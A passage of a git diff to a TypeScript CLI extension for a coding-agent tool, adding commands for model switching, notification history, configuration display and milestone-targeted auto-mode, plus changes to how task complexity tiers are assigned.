CODEBASE.md cache immediately (preserves descriptions)" }, + { cmd: "update --max-files", desc: "Update with custom file limit" }, + { cmd: "update --collapse-threshold", desc: "Update with custom collapse threshold" }, + { cmd: "stats", desc: "Show file count, description coverage, and generation time" }, + { cmd: "help", desc: "Show usage and available subcommands" }, + ], }; function filterOptions( diff --git a/src/resources/extensions/gsd/commands/context.ts b/src/resources/extensions/gsd/commands/context.ts index 07f237592..f4a5aa423 100644 --- a/src/resources/extensions/gsd/commands/context.ts +++ b/src/resources/extensions/gsd/commands/context.ts @@ -13,7 +13,13 @@ export interface GsdDispatchContext { } export function projectRoot(): string { - const cwd = process.cwd(); + let cwd: string; + try { + cwd = process.cwd(); + } catch { + // cwd directory was deleted (e.g. worktree teardown) — fall back to HOME (#3598) + cwd = process.env.HOME ?? "/"; + } const root = resolveProjectRoot(cwd); if (root !== cwd) { assertSafeDirectory(cwd); @@ -47,15 +53,10 @@ export async function guardRemoteSession( return false; } - const unitsMsg = remote.completedUnits != null - ? `${remote.completedUnits} units completed` - : ""; - const choice = await showNextAction(ctx, { title: `Auto-mode is running in another terminal (PID ${remote.pid})`, summary: [ `Currently executing: ${unitLabel}`, - ...(unitsMsg ? [unitsMsg] : []), ...(remote.startedAt ? [`Started: ${remote.startedAt}`] : []), ], actions: [ diff --git a/src/resources/extensions/gsd/commands/dispatcher.ts b/src/resources/extensions/gsd/commands/dispatcher.ts index 9f28cbbaa..a3d11344b 100644 --- a/src/resources/extensions/gsd/commands/dispatcher.ts +++ b/src/resources/extensions/gsd/commands/dispatcher.ts @@ -14,7 +14,7 @@ export async function handleGSDCommand( const trimmed = (typeof args === "string" ? args : "").trim(); const handlers = [ - () => handleCoreCommand(trimmed, ctx), + () => handleCoreCommand(trimmed, ctx, pi), () => handleAutoCommand(trimmed, ctx, pi), () => handleParallelCommand(trimmed, ctx, pi), () => handleWorkflowCommand(trimmed, ctx, pi), @@ -29,4 +29,3 @@ export async function handleGSDCommand( ctx.ui.notify(`Unknown: /gsd ${trimmed}. Run /gsd help for available commands.`, "warning"); } - diff --git a/src/resources/extensions/gsd/commands/handlers/auto.ts b/src/resources/extensions/gsd/commands/handlers/auto.ts index b261d8a34..923191cfb 100644 --- a/src/resources/extensions/gsd/commands/handlers/auto.ts +++ b/src/resources/extensions/gsd/commands/handlers/auto.ts @@ -1,9 +1,66 @@ import type { ExtensionAPI, ExtensionCommandContext } from "@gsd/pi-coding-agent"; +import { existsSync, readFileSync } from "node:fs"; +import { resolve } from "node:path"; + import { enableDebug } from "../../debug-logger.js"; import { getAutoDashboardData, isAutoActive, isAutoPaused, pauseAuto, startAuto, stopAuto, stopAutoRemote } from "../../auto.js"; import { handleRate } from "../../commands-rate.js"; import { guardRemoteSession, projectRoot } from "../context.js"; +import { findMilestoneIds } from "../../milestone-id-utils.js"; + +/** + * Parse --yolo flag and optional file path from the auto command string. + * Supports: `/gsd auto --yolo path/to/file.md` or `/gsd auto -y path/to/file.md` + */ +function parseYoloFlag(trimmed: string): { yoloSeedFile: string | null; rest: string } { + const yoloRe = /(?:--yolo|-y)\s+("(?:[^"\\]|\\.)*"|'(?:[^'\\]|\\.)*'|\S+)/; + const match = trimmed.match(yoloRe); + if (!match) return { yoloSeedFile: null, rest: trimmed }; + + // Strip quotes if present + let filePath = match[1]; + if ((filePath.startsWith('"') && filePath.endsWith('"')) || + (filePath.startsWith("'") && filePath.endsWith("'"))) { + filePath = filePath.slice(1, -1); + } + + const rest = trimmed.replace(match[0], "").replace(/\s+/g, " ").trim(); + return { yoloSeedFile: filePath, rest }; +} + +/** + * Extract a milestone ID (e.g. M016 or M001-a3b4c5) from the command string. + * Returns the matched ID and the remaining string with the ID removed. + * The milestone ID pattern matches the format used by findMilestoneIds: M\d+ with + * an optional -[a-z0-9]{6} suffix for unique milestone IDs. + */ +export function parseMilestoneTarget(input: string): { milestoneId: string | null; rest: string } { + const match = input.match(/\b(M\d+(?:-[a-z0-9]{6})?)\b/); + if (!match) return { milestoneId: null, rest: input }; + const rest = input.replace(match[0], "").replace(/\s+/g, " ").trim(); + return { milestoneId: match[1], rest }; +} + +/** + * Set GSD_MILESTONE_LOCK to target a specific milestone, then run `fn`. + * Clears the env var when `fn` resolves or rejects, so the lock does not + * leak into subsequent commands in the same process. + */ +async function withMilestoneLock(milestoneId: string, fn: () => Promise): Promise { + const previous = process.env.GSD_MILESTONE_LOCK; + process.env.GSD_MILESTONE_LOCK = milestoneId; + try { + await fn(); + } finally { + // Restore previous value (undefined → delete, else restore). + if (previous === undefined) { + delete process.env.GSD_MILESTONE_LOCK; + } else { + process.env.GSD_MILESTONE_LOCK = previous; + } + } +} export async function handleAutoCommand(trimmed: string, ctx: ExtensionCommandContext, pi: ExtensionAPI): Promise { if (trimmed === "next" || trimmed.startsWith("next ")) { @@ -12,20 +69,73 @@ export async function handleAutoCommand(trimmed: string, ctx: ExtensionCommandCo await handleDryRun(ctx, projectRoot()); return true; } - const verboseMode = trimmed.includes("--verbose"); - const debugMode = trimmed.includes("--debug"); + const { milestoneId, rest: afterMilestone } = parseMilestoneTarget(trimmed); + const verboseMode = afterMilestone.includes("--verbose"); + const debugMode = afterMilestone.includes("--debug"); if (debugMode) enableDebug(projectRoot()); if (!(await guardRemoteSession(ctx, pi))) return true; - await startAuto(ctx, pi, projectRoot(), verboseMode, { step: true }); + + // Validate the milestone target exists and is not already complete. + if (milestoneId) { + const allIds = findMilestoneIds(projectRoot()); + if (!allIds.includes(milestoneId)) { + ctx.ui.notify(`Milestone ${milestoneId} does not exist. Available: ${allIds.join(", ") || "(none)"}`, "error"); + return true; + } + } + + if (milestoneId) { + await withMilestoneLock(milestoneId, () => + startAuto(ctx, pi, projectRoot(), verboseMode, { step: true }), + ); + } else { + await startAuto(ctx, pi, projectRoot(), verboseMode, { step: true }); + } return true; } if (trimmed === "auto" || trimmed.startsWith("auto ")) { - const verboseMode = trimmed.includes("--verbose"); - const debugMode = trimmed.includes("--debug"); + const { yoloSeedFile, rest: afterYolo } = parseYoloFlag(trimmed); + const { milestoneId, rest: afterMilestone } = parseMilestoneTarget(afterYolo); + const verboseMode = afterMilestone.includes("--verbose"); + const debugMode = afterMilestone.includes("--debug"); if (debugMode) enableDebug(projectRoot()); if (!(await guardRemoteSession(ctx, pi))) return true; - await startAuto(ctx, pi, projectRoot(), verboseMode); + + // Validate the milestone target exists and is not already complete. + if (milestoneId) { + const allIds = findMilestoneIds(projectRoot()); + if (!allIds.includes(milestoneId)) { + ctx.ui.notify(`Milestone ${milestoneId} does not exist. Available: ${allIds.join(", ") || "(none)"}`, "error"); + return true; + } + } + + if (yoloSeedFile) { + const resolved = resolve(projectRoot(), yoloSeedFile); + if (!existsSync(resolved)) { + ctx.ui.notify(`Yolo seed file not found: ${resolved}`, "error"); + return true; + } + const seedContent = readFileSync(resolved, "utf-8").trim(); + if (!seedContent) { + ctx.ui.notify(`Yolo seed file is empty: ${resolved}`, "error"); + return true; + } + // Headless path: bootstrap project, dispatch non-interactive discuss, + // then auto-mode starts automatically via checkAutoStartAfterDiscuss + // when the LLM says "Milestone X ready." + const { showHeadlessMilestoneCreation } = await import("../../guided-flow.js"); + await showHeadlessMilestoneCreation(ctx, pi, projectRoot(), seedContent); + } else if (milestoneId) { + // Target a specific milestone — use GSD_MILESTONE_LOCK so state + // derivation only sees this milestone (#2521). + await withMilestoneLock(milestoneId, () => + startAuto(ctx, pi, projectRoot(), verboseMode), + ); + } else { + await startAuto(ctx, pi, projectRoot(), verboseMode); + } return true; } diff --git a/src/resources/extensions/gsd/commands/handlers/core.ts b/src/resources/extensions/gsd/commands/handlers/core.ts index 3028f72c5..ae8da6c60 100644 --- a/src/resources/extensions/gsd/commands/handlers/core.ts +++ b/src/resources/extensions/gsd/commands/handlers/core.ts @@ -1,4 +1,5 @@ -import type { ExtensionCommandContext, ExtensionContext } from "@gsd/pi-coding-agent"; +import type { ExtensionAPI, ExtensionCommandContext, ExtensionContext } from "@gsd/pi-coding-agent"; +import type { Model } from "@gsd/pi-ai"; import type { GSDState } from "../../types.js"; import { computeProgressScore, formatProgressLine } from "../../progress-score.js"; @@ -8,6 +9,7 @@ import { runEnvironmentChecks } from "../../doctor-environment.js"; import { deriveState } from "../../state.js"; import { handleCmux } from "../../commands-cmux.js"; import { projectRoot } from "../context.js"; +import { formatShortcut } from "../../files.js"; export function showHelp(ctx: ExtensionCommandContext): void { const lines = [ @@ -24,11 +26,12 @@ export function showHelp(ctx: ExtensionCommandContext): void { " /gsd new-milestone Create milestone from headless context (used by gsd headless)", "", "VISIBILITY", - " /gsd status Show progress dashboard (Ctrl+Alt+G)", + ` /gsd status Show progress dashboard (${formatShortcut("Ctrl+Alt+G")})`, " /gsd visualize Interactive 10-tab TUI (progress, timeline, deps, metrics, health, agent, changes, knowledge, captures, export)", " /gsd queue Show queued/dispatched units and execution order", " /gsd history View execution history [--cost] [--phase] [--model] [N]", " /gsd changelog Show categorized release notes [version]", + ` /gsd notifications View persistent notification history [clear|tail|filter] (${formatShortcut("Ctrl+Alt+N")})`, "", "COURSE CORRECTION", " /gsd steer Apply user override to active work", @@ -36,23 +39,28 @@ export function showHelp(ctx: ExtensionCommandContext): void { " /gsd triage Classify and route pending captures", " /gsd skip Prevent a unit from auto-mode dispatch", " /gsd undo Revert last completed unit [--force]", + " /gsd rethink Conversational project reorganization — reorder, park, discard, add milestones", " /gsd park [id] Park a milestone — skip without deleting [reason]", " /gsd unpark [id] Reactivate a parked milestone", "", "PROJECT KNOWLEDGE", " /gsd knowledge Add rule, pattern, or lesson to KNOWLEDGE.md", + " /gsd codebase [generate|update|stats] Manage the CODEBASE.md cache used in prompt context", "", "SETUP & CONFIGURATION", " /gsd init Project init wizard — detect, configure, bootstrap .gsd/", " /gsd setup Global setup status [llm|search|remote|keys|prefs]", + " /gsd model Switch active session model [provider/model|model-id]", " /gsd mode Set workflow mode (solo/team) [global|project]", " /gsd prefs Manage preferences [global|project|status|wizard|setup|import-claude]", " /gsd cmux Manage cmux integration [status|on|off|notifications|sidebar|splits|browser]", " /gsd config Set API keys for external tools", " /gsd keys API key manager [list|add|remove|test|rotate|doctor]", + " /gsd show-config Show effective configuration (models, routing, toggles)", " /gsd hooks Show post-unit hook configuration", " /gsd extensions Manage extensions [list|enable|disable|info]", " /gsd fast Toggle OpenAI service tier [on|off|flex|status]", + " /gsd mcp MCP server status and connectivity [status|check ]", "", "MAINTENANCE", " /gsd doctor Diagnose and repair .gsd/ state [audit|fix|heal] [scope]", @@ -68,6 +76,9 @@ export function showHelp(ctx: ExtensionCommandContext): void { export async function handleStatus(ctx: ExtensionCommandContext): Promise { const basePath = projectRoot(); + // Open DB in cold sessions so status uses DB-backed state, not filesystem fallback (#3385) + const { ensureDbOpen } = await import("../../bootstrap/dynamic-tools.js"); + await ensureDbOpen(); const state = await deriveState(basePath); if (state.registry.length === 0) { @@ -76,8 +87,8 @@ export async function handleStatus(ctx: ExtensionCommandContext): Promise } const { GSDDashboardOverlay } = await import("../../dashboard-overlay.js"); - const result = await ctx.ui.custom( - (tui, theme, _kb, done) => new GSDDashboardOverlay(tui, theme, () => done()), + const result = await ctx.ui.custom( + (tui, theme, _kb, done) => new GSDDashboardOverlay(tui, theme, () => done(true)), { overlay: true, overlayOptions: { @@ -105,8 +116,8 @@ export async function handleVisualize(ctx: ExtensionCommandContext): Promise( - (tui, theme, _kb, done) => new GSDVisualizerOverlay(tui, theme, () => done()), + const result = await ctx.ui.custom( + (tui, theme, _kb, done) => new GSDVisualizerOverlay(tui, theme, () => done(true)), { overlay: true, overlayOptions: { @@ -171,7 +182,106 @@ export async function handleSetup(args: string, ctx: ExtensionCommandContext): P ); } -export async function handleCoreCommand(trimmed: string, ctx: ExtensionCommandContext): Promise { +function sortModelsForSelection(models: Model[], currentModel: Model | undefined): Model[] { + return [...models].sort((a, b) => { + const aCurrent = currentModel && a.provider === currentModel.provider && a.id === currentModel.id; + const bCurrent = currentModel && b.provider === currentModel.provider && b.id === currentModel.id; + if (aCurrent && !bCurrent) return -1; + if (!aCurrent && bCurrent) return 1; + const providerCmp = a.provider.localeCompare(b.provider); + if (providerCmp !== 0) return providerCmp; + return a.id.localeCompare(b.id); + }); +} + +async function resolveRequestedModel( + query: string, + ctx: ExtensionCommandContext, +): Promise | undefined> { + const { resolveModelId } = await import("../../auto-model-selection.js"); + const models = ctx.modelRegistry.getAvailable(); + const exact = resolveModelId(query, models, ctx.model?.provider); + if (exact) return exact; + + const lowerQuery = query.toLowerCase(); + const partialMatches = models.filter((model) => + model.id.toLowerCase().includes(lowerQuery) + || `${model.provider}/${model.id}`.toLowerCase().includes(lowerQuery), + ); + + if (partialMatches.length === 1) return partialMatches[0]; + if (partialMatches.length === 0 || !ctx.hasUI) return undefined; + + const sorted = sortModelsForSelection(partialMatches, ctx.model); + const optionToModel = new Map>(); + const options = sorted.map((model) => { + const label = `${model.provider}/${model.id}`; + optionToModel.set(label, model); + return label; + }); + options.push("(cancel)"); + + const choice = await ctx.ui.select(`Multiple models match "${query}" — choose one:`, options); + if (!choice || typeof choice !== "string" || choice === "(cancel)") return undefined; + return optionToModel.get(choice); +} + +async function handleModel(trimmedArgs: string, ctx: ExtensionCommandContext, pi: ExtensionAPI | undefined): Promise { + const availableModels = ctx.modelRegistry.getAvailable(); + if (availableModels.length === 0) { + ctx.ui.notify("No available models found. Check provider auth and model discovery.", "warning"); + return; + } + if (!pi) { + ctx.ui.notify("Model switching is unavailable in this context.", "warning"); + return; + } + + const trimmed = trimmedArgs.trim(); + let targetModel: Model | undefined; + + if (!trimmed) { + if (!ctx.hasUI) { + const current = ctx.model ? `${ctx.model.provider}/${ctx.model.id}` : "(none)"; + ctx.ui.notify(`Current model: ${current}\nUsage: /gsd model `, "info"); + return; + } + + const optionToModel = new Map>(); + const options = sortModelsForSelection(availableModels, ctx.model).map((model) => { + const isCurrent = ctx.model && model.provider === ctx.model.provider && model.id === ctx.model.id; + const label = `${isCurrent ? "* " : ""}${model.provider}/${model.id}`; + optionToModel.set(label, model); + return label; + }); + options.push("(cancel)"); + + const choice = await ctx.ui.select("Select session model:", options); + if (!choice || typeof choice !== "string" || choice === "(cancel)") return; + targetModel = optionToModel.get(choice); + } else { + targetModel = await resolveRequestedModel(trimmed, ctx); + } + + if (!targetModel) { + ctx.ui.notify(`Model "${trimmed}" not found. Use /gsd model with an exact provider/model or a unique model ID.`, "warning"); + return; + } + + const ok = await pi.setModel(targetModel); + if (!ok) { + ctx.ui.notify(`No API key for ${targetModel.provider}/${targetModel.id}`, "warning"); + return; + } + + ctx.ui.notify(`Model: ${targetModel.provider}/${targetModel.id}`, "info"); +} + +export async function handleCoreCommand( + trimmed: string, + ctx: ExtensionCommandContext, + pi?: ExtensionAPI, +): Promise { if (trimmed === "help" || trimmed === "h" || trimmed === "?") { showHelp(ctx); return true; @@ -195,6 +305,10 @@ export async function handleCoreCommand(trimmed: string, ctx: ExtensionCommandCo ctx.ui.notify(`Widget: ${getWidgetMode()}`, "info"); return true; } + if (trimmed === "model" || trimmed.startsWith("model ")) { + await handleModel(trimmed.replace(/^model\s*/, "").trim(), ctx, pi); + return true; + } if (trimmed === "mode" || trimmed.startsWith("mode ")) { const modeArgs = trimmed.replace(/^mode\s*/, "").trim(); const scope = modeArgs === "project" ? "project" : "global"; @@ -211,6 +325,25 @@ export async function handleCoreCommand(trimmed: string, ctx: ExtensionCommandCo await handleCmux(trimmed.replace(/^cmux\s*/, "").trim(), ctx); return true; } + if (trimmed === "show-config") { + const { GSDConfigOverlay, formatConfigText } = await import("../../config-overlay.js"); + const result = await ctx.ui.custom( + (tui, theme, _kb, done) => new GSDConfigOverlay(tui, theme, () => done(true)), + { + overlay: true, + overlayOptions: { + width: "65%", + minWidth: 55, + maxHeight: "85%", + anchor: "center", + }, + }, + ); + if (result === undefined) { + ctx.ui.notify(formatConfigText(), "info"); + } + return true; + } if (trimmed === "setup" || trimmed.startsWith("setup ")) { await handleSetup(trimmed.replace(/^setup\s*/, "").trim(), ctx); return true; diff --git a/src/resources/extensions/gsd/commands/handlers/notifications-handler.ts b/src/resources/extensions/gsd/commands/handlers/notifications-handler.ts new file mode 100644 index 000000000..16d30d49a --- /dev/null +++ b/src/resources/extensions/gsd/commands/handlers/notifications-handler.ts @@ -0,0 +1,140 @@ +// GSD Extension — /gsd notifications Command Handler +// View, filter, and clear the persistent notification history. + +import type { ExtensionAPI, ExtensionCommandContext } from "@gsd/pi-coding-agent"; + +import { + readNotifications, + clearNotifications, + getUnreadCount, + suppressPersistence, + unsuppressPersistence, + type NotifySeverity, +} from "../../notification-store.js"; +import { GSDNotificationOverlay } from "../../notification-overlay.js"; + +function severityIcon(severity: NotifySeverity): string { + switch (severity) { + case "error": return "✗"; + case "warning": return "⚠"; + case "success": return "✓"; + case "info": + default: return "●"; + } +} + +function formatTimestamp(ts: string): string { + try { + const d = new Date(ts); + return d.toLocaleString("en-US", { hour12: false, month: "short", day: "numeric", hour: "2-digit", minute: "2-digit" }); + } catch { + return ts.slice(0, 19); + } +} + +export async function handleNotificationsCommand( + args: string, + ctx: ExtensionCommandContext, + pi: ExtensionAPI, +): Promise { + // /gsd notifications clear + if (args === "clear") { + clearNotifications(); + // Suppress persistence so the confirmation toast doesn't re-populate the store + suppressPersistence(); + try { + ctx.ui.notify("All notifications cleared.", "success"); + } finally { + unsuppressPersistence(); + } + return true; + } + + // /gsd notifications tail [N] + if (args === "tail" || args.startsWith("tail ")) { + const countStr = args.replace(/^tail\s*/, "").trim(); + const count = countStr ? parseInt(countStr, 10) : 20; + const n = isNaN(count) || count < 1 ? 20 : Math.min(count, 100); + const entries = readNotifications().slice(0, n); + + if (entries.length === 0) { + ctx.ui.notify("No notifications.", "info"); + return true; + } + + const lines = entries.map((e) => + `${severityIcon(e.severity)} [${formatTimestamp(e.ts)}] ${e.message}`, + ); + ctx.ui.notify(`Last ${entries.length} notification(s):\n${lines.join("\n")}`, "info"); + return true; + } + + // /gsd notifications filter + if (args.startsWith("filter ")) { + const severity = args.replace(/^filter\s+/, "").trim().toLowerCase(); + if (!["error", "warning", "info", "success"].includes(severity)) { + ctx.ui.notify("Usage: /gsd notifications filter ", "warning"); + return true; + } + const entries = readNotifications().filter((e) => e.severity === severity); + + if (entries.length === 0) { + ctx.ui.notify(`No ${severity} notifications.`, "info"); + return true; + } + + const lines = entries.slice(0, 20).map((e) => + `${severityIcon(e.severity)} [${formatTimestamp(e.ts)}] ${e.message}`, + ); + const suffix = entries.length > 20 ? `\n... and ${entries.length - 20} more` : ""; + ctx.ui.notify(`${severity} notifications (${entries.length}):\n${lines.join("\n")}${suffix}`, "info"); + return true; + } + + // /gsd notifications (no args) — open overlay in TUI, or print summary + if (args === "" || args === "status") { + // Try overlay first (TUI mode) + if (ctx.hasUI) { + try { + await ctx.ui.custom( + (tui, theme, _kb, done) => new GSDNotificationOverlay(tui, theme, () => done()), + { + overlay: true, + overlayOptions: { + width: "80%", + minWidth: 60, + maxHeight: "88%", + anchor: "center", + backdrop: true, + }, + }, + ); + return true; + } catch { + // Fall through to text output if overlay fails + } + } + + // Text fallback (RPC/headless mode) + const unread = getUnreadCount(); + const entries = readNotifications().slice(0, 10); + if (entries.length === 0) { + ctx.ui.notify("No notifications.", "info"); + return true; + } + + const lines = entries.map((e) => + `${severityIcon(e.severity)} [${formatTimestamp(e.ts)}] ${e.message}`, + ); + const header = unread > 0 ? `${unread} unread — ` : ""; + ctx.ui.notify(`${header}Recent notifications:\n${lines.join("\n")}`, "info"); + return true; + } + + // Unknown subcommand + ctx.ui.notify( + "Usage: /gsd notifications [clear|tail [N]|filter ]", + "warning", + ); + return true; +} diff --git a/src/resources/extensions/gsd/commands/handlers/ops.ts b/src/resources/extensions/gsd/commands/handlers/ops.ts index 763c434f3..532a4b4ec 100644 --- a/src/resources/extensions/gsd/commands/handlers/ops.ts +++ b/src/resources/extensions/gsd/commands/handlers/ops.ts @@ -6,7 +6,7 @@ import { handleConfig } from "../../commands-config.js"; import { handleDoctor, handleCapture, handleKnowledge, handleRunHook, handleSkillHealth, handleSteer, handleTriage, handleUpdate } from "../../commands-handlers.js"; import { handleInspect } from "../../commands-inspect.js"; import { handleLogs } from "../../commands-logs.js"; -import { handleCleanupBranches, handleCleanupSnapshots, handleSkip, handleCleanupProjects, handleCleanupWorktrees } from "../../commands-maintenance.js"; +import { handleCleanupBranches, handleCleanupSnapshots, handleSkip, handleCleanupProjects, handleCleanupWorktrees, handleRecover } from "../../commands-maintenance.js"; import { handleExport } from "../../export.js"; import { handleHistory } from "../../history.js"; import { handleUndo } from "../../undo.js"; @@ -53,6 +53,16 @@ export async function handleOpsCommand(trimmed: string, ctx: ExtensionCommandCon await handleHistory(trimmed.replace(/^history\s*/, "").trim(), ctx, projectRoot()); return true; } + if (trimmed === "undo-task" || trimmed.startsWith("undo-task ")) { + const { handleUndoTask } = await import("../../undo.js"); + await handleUndoTask(trimmed.replace(/^undo-task\s*/, "").trim(), ctx, pi, projectRoot()); + return true; + } + if (trimmed === "reset-slice" || trimmed.startsWith("reset-slice ")) { + const { handleResetSlice } = await import("../../undo.js"); + await handleResetSlice(trimmed.replace(/^reset-slice\s*/, "").trim(), ctx, pi, projectRoot()); + return true; + } if (trimmed === "undo" || trimmed.startsWith("undo ")) { await handleUndo(trimmed.replace(/^undo\s*/, "").trim(), ctx, pi, projectRoot()); return true; @@ -65,6 +75,10 @@ export async function handleOpsCommand(trimmed: string, ctx: ExtensionCommandCon await handleSkip(trimmed.replace(/^skip\s*/, "").trim(), ctx, projectRoot()); return true; } + if (trimmed === "recover") { + await handleRecover(ctx, projectRoot()); + return true; + } if (trimmed === "export" || trimmed.startsWith("export ")) { await handleExport(trimmed.replace(/^export\s*/, "").trim(), ctx, projectRoot()); return true; @@ -164,6 +178,11 @@ Examples: await dispatchDirectPhase(ctx, pi, phase, projectRoot()); return true; } + if (trimmed === "notifications" || trimmed.startsWith("notifications ")) { + const { handleNotificationsCommand } = await import("./notifications-handler.js"); + await handleNotificationsCommand(trimmed.replace(/^notifications\s*/, "").trim(), ctx, pi); + return true; + } if (trimmed === "inspect") { await handleInspect(ctx); return true; @@ -177,10 +196,25 @@ Examples: await handleFast(trimmed.replace(/^fast\s*/, "").trim(), ctx); return true; } + if (trimmed === "mcp" || trimmed.startsWith("mcp ")) { + const { handleMcpStatus } = await import("../../commands-mcp-status.js"); + await handleMcpStatus(trimmed.replace(/^mcp\s*/, "").trim(), ctx); + return true; + } if (trimmed === "extensions" || trimmed.startsWith("extensions ")) { const { handleExtensions } = await import("../../commands-extensions.js"); await handleExtensions(trimmed.replace(/^extensions\s*/, "").trim(), ctx); return true; } + if (trimmed === "rethink") { + const { handleRethink } = await import("../../rethink.js"); + await handleRethink(trimmed, ctx, pi); + return true; + } + if (trimmed === "codebase" || trimmed.startsWith("codebase ")) { + const { handleCodebase } = await import("../../commands-codebase.js"); + await handleCodebase(trimmed.replace(/^codebase\s*/, "").trim(), ctx, pi); + return true; + } return false; } diff --git a/src/resources/extensions/gsd/commands/handlers/parallel.ts b/src/resources/extensions/gsd/commands/handlers/parallel.ts index a2acb5367..bc8eea7da 100644 --- a/src/resources/extensions/gsd/commands/handlers/parallel.ts +++ b/src/resources/extensions/gsd/commands/handlers/parallel.ts @@ -63,7 +63,7 @@ export async function handleParallelCommand(trimmed: string, _ctx: ExtensionComm } const lines = ["# Parallel Workers\n"]; for (const worker of workers) { - lines.push(`- **${worker.milestoneId}** (${worker.title}) — ${worker.state} — ${worker.completedUnits} units — $${worker.cost.toFixed(2)}`); + lines.push(`- **${worker.milestoneId}** (${worker.title}) — ${worker.state} — $${worker.cost.toFixed(2)}`); } const state = getOrchestratorState(); if (state) { @@ -111,7 +111,25 @@ export async function handleParallelCommand(trimmed: string, _ctx: ExtensionComm return true; } - emitParallelMessage(pi, `Unknown parallel subcommand "${subcommand}". Usage: /gsd parallel [start|status|stop|pause|resume|merge]`); + if (subcommand === "watch") { + const root = projectRoot(); + const { ParallelMonitorOverlay } = await import("../../parallel-monitor-overlay.js"); + await _ctx.ui.custom( + (tui, theme, _kb, done) => new ParallelMonitorOverlay(tui, theme, () => done(), root), + { + overlay: true, + overlayOptions: { + width: "90%", + minWidth: 80, + maxHeight: "92%", + anchor: "center", + }, + }, + ); + return true; + } + + emitParallelMessage(pi, `Unknown parallel subcommand "${subcommand}". Usage: /gsd parallel [start|status|stop|pause|resume|merge|watch]`); return true; } diff --git a/src/resources/extensions/gsd/commands/handlers/workflow.ts b/src/resources/extensions/gsd/commands/handlers/workflow.ts index 9a0169931..10282fbcc 100644 --- a/src/resources/extensions/gsd/commands/handlers/workflow.ts +++ b/src/resources/extensions/gsd/commands/handlers/workflow.ts @@ -188,6 +188,14 @@ export async function handleWorkflowCommand(trimmed: string, ctx: ExtensionComma return true; } if (trimmed === "quick" || trimmed.startsWith("quick ")) { + if (isAutoActive()) { + ctx.ui.notify( + "/gsd quick cannot run while auto-mode is active.\n" + + "Stop auto-mode first with /gsd stop, then run /gsd quick.", + "error", + ); + return true; + } await handleQuick(trimmed.replace(/^quick\s*/, "").trim(), ctx, pi); return true; } diff --git a/src/resources/extensions/gsd/complexity-classifier.ts b/src/resources/extensions/gsd/complexity-classifier.ts index 6e117cccd..82027227f 100644 --- a/src/resources/extensions/gsd/complexity-classifier.ts +++ b/src/resources/extensions/gsd/complexity-classifier.ts @@ -16,6 +16,7 @@ export interface ClassificationResult { tier: ComplexityTier; reason: string; downgraded: boolean; // true if budget pressure lowered the tier + taskMetadata?: TaskMetadata; } export interface TaskMetadata { @@ -35,14 +36,17 @@ const UNIT_TYPE_TIERS: Record = { "complete-slice": "light", "run-uat": "light", - // Tier 2 — Standard: research, routine planning, discussion + // Tier 2 — Standard: research, routine discussion "discuss-milestone": "standard", + "discuss-slice": "standard", "research-milestone": "standard", "research-slice": "standard", - "plan-milestone": "standard", - "plan-slice": "standard", - // Tier 3 — Heavy: execution, replanning (requires deep reasoning) + // Tier 3 — Heavy: planning, execution, replanning (requires deep reasoning) + // Planning is heavy so it uses the best configured model (e.g. Opus) and is + // not downgraded by dynamic routing when a capable model is configured. + "plan-milestone": "heavy", + "plan-slice": "heavy", "execute-task": "standard", // default standard, upgraded by metadata "replan-slice": "heavy", "reassess-roadmap": "heavy", @@ -68,17 +72,20 @@ export function classifyUnitComplexity( ): ClassificationResult { // Hook units default to light if (unitType.startsWith("hook/")) { - const result: ClassificationResult = { tier: "light", reason: "hook unit", downgraded: false }; + const result: ClassificationResult = { tier: "light", reason: "hook unit", downgraded: false, taskMetadata: undefined }; return applyBudgetPressure(result, budgetPct); } // Start with the default tier for this unit type let tier = UNIT_TYPE_TIERS[unitType] ?? "standard"; let reason = `unit type: ${unitType}`; + let taskMeta: TaskMetadata | undefined; // For execute-task, analyze task metadata for complexity signals if (unitType === "execute-task") { - const taskAnalysis = analyzeTaskComplexity(unitId, basePath, metadata); + // Extract metadata once and reuse throughout to avoid double-extraction + taskMeta = metadata ?? extractTaskMetadata(unitId, basePath); + const taskAnalysis = analyzeTaskComplexity(unitId, basePath, taskMeta); tier = taskAnalysis.tier; reason = taskAnalysis.reason; } @@ -93,14 +100,15 @@ export function classifyUnitComplexity( } // Adaptive learning: check if history suggests bumping the tier - const tags = metadata?.tags ?? extractTaskMetadata(unitId, basePath).tags; + // Use already-extracted taskMeta.tags if available to avoid double-extraction + const tags = taskMeta?.tags ?? metadata?.tags; const adaptiveAdjustment = getAdaptiveTierAdjustment(unitType, tier, tags); if (adaptiveAdjustment && tierOrdinal(adaptiveAdjustment) > tierOrdinal(tier)) { reason = `${reason} (adaptive: high failure rate at ${tier})`; tier = adaptiveAdjustment; } - const result: ClassificationResult = { tier, reason, downgraded: false }; + const result: ClassificationResult = { tier, reason, downgraded: false, taskMetadata: taskMeta }; return applyBudgetPressure(result, budgetPct); } @@ -184,8 +192,8 @@ function analyzePlanComplexity( // Check if this is a milestone-level plan (more complex) vs single slice const { milestone: mid, slice: sid } = parseUnitId(unitId); if (!sid) { - // Milestone-level planning is always at least standard - return { tier: "standard", reason: "milestone-level planning" }; + // Milestone-level planning is always heavy — requires full context and best model + return { tier: "heavy", reason: "milestone-level planning" }; } // For slice planning, try to read the context/research to gauge complexity @@ -209,7 +217,7 @@ function analyzePlanComplexity( /** * Extract task metadata from the task plan file on disk. */ -function extractTaskMetadata(unitId: string, basePath: string): TaskMetadata { +export function extractTaskMetadata(unitId: string, basePath: string): TaskMetadata { const meta: TaskMetadata = {}; const { milestone: mid, slice: sid, task: tid } = parseUnitId(unitId); if (!mid || !sid || !tid) return meta; diff --git a/src/resources/extensions/gsd/config-overlay.ts b/src/resources/extensions/gsd/config-overlay.ts new file mode 100644 index 000000000..1b9cf2852 --- /dev/null +++ b/src/resources/extensions/gsd/config-overlay.ts @@ -0,0 +1,331 @@ +/** + * GSD Configuration Overlay + * + * Read-only TUI overlay showing the effective GSD configuration: + * token profile, model assignments, dynamic routing, git settings, + * budget, workflow toggles, and preference file sources. + * Opened via `/gsd show-config` or `/gsd config`. + */ + +import type { Theme } from "@gsd/pi-coding-agent"; +import { matchesKey, Key, truncateToWidth } from "@gsd/pi-tui"; + +import { + loadEffectiveGSDPreferences, + loadGlobalGSDPreferences, + loadProjectGSDPreferences, + getGlobalGSDPreferencesPath, + getProjectGSDPreferencesPath, + resolveDynamicRoutingConfig, + resolveEffectiveProfile, + resolveModelWithFallbacksForUnit, + resolveAutoSupervisorConfig, +} from "./preferences.js"; + +// ─── Data Collection ────────────────────────────────────────────────────── + +interface ConfigSection { + title: string; + rows: Array<{ label: string; value: string; accent?: boolean }>; +} + +function collectConfigSections(): ConfigSection[] { + const sections: ConfigSection[] 